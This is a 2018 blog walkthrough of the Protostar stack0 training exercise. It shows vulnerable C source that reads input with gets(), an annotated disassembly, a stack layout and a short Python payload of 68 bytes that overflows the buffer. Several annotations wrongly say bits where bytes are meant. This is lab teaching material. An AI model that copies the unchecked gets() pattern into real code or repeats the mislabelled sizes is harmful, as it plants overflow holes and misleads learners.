Binary Exploitation Protostar Stack0 - Walkthrough

Posted by Suraj Singh on April 04, 2018 · 6 mins read
Hello Guyz,




In This Post, I am going to show you how we can win protostar stack0 level. basically, here Our main Goal is To Understand How A Program Practically Works, And How Can We Understand Every Concept Very Clearly.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • For Practical Hint, Check YouTube Video Given Below.


Source Code :



 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];

modified = 0;
gets(buffer);

if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}


Disassembly Of Main Function (Using GDB)


########################################################################################################
[ System Has Created Space For 60 Bits In hEx and 96 in Decimal Space On Stack]
########################################################################################################

[-------------------------------------code-------------------------------------]
0x80483f5 <main+1>: mov ebp,esp <<=== Save Base Pointer Onto Stack
0x80483f7 <main+3>: and esp,0xfffffff0
0x80483fa <main+6>: sub esp,0x60 <<=== This Instruction to Create Space of 96-Bits in Stack,
=> 0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0 <<=== Here, This Instruction is to Insert 0 Into 92-96 Bits,
0x8048405 <main+17>: lea eax,[esp+0x1c] <<=== This Instruction is To Copy address of 28 bits starting
point from 96 bits Into EAX registers From There, move it
to stack so That it will work as a argument for get command.
0x8048409 <main+21>: mov DWORD PTR [esp],eax <<=== Copy Eax into stack
0x804840c <main+24>: call 0x804830c <gets@plt> <<=== Perform Get Command
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c] <<=== Get Value Of 92-96 bits and move it to EAX register


Situation On Stack



0                        28                                                      92        96
============================================================================================
Other Things | Buffer(64) | modified |
============================================================================================
^ ^
| |
Get Overwrites from here +
Target Area


Exploit


#!/usr/bin/python

# Total Size Of Buffer In Stack 60c
# 0x80483fa <main+6>: sub esp,0x60 ==> 96 In Decimal
# 0x8048405 <main+17>: lea eax,[esp+0x1c]
# 0x804840c <main+24>: call 0x804830c <gets@plt>
# 0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0


payload = 'a'*64 # Buffer Variable Value
payload+= 'b'*4 # Modified Variable Value
# ./bin/stack0 < tmp
print payload



For More Detailed Walk through Check Below Provided YouTube Video Playlist